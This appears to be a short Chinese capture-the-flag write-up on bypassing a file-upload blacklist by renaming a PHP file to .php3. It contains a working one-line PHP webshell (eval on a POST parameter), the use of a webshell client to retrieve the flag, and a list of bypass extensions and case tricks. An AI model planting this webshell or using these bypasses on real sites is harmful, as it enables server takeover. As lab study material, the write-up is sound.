直接上传 php文件
无法通过校验
在网上搜索资料后发现,在php/5.x.x中,后缀名为php3、php4、php5的文件都可以解析为php文件,于是试着将后缀名为php3
居然成功了
使用一句话木马
<?php eval(@$_POST['a']); ?>
菜刀无惧链接,拿到key
思路拓展:
黑名单校验(一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件)
绕过方法:
1.找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
2.可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表:
jsp jspx jspf
asp asa cer aspx
php phtml php3 php4 php5 pwml
exe exee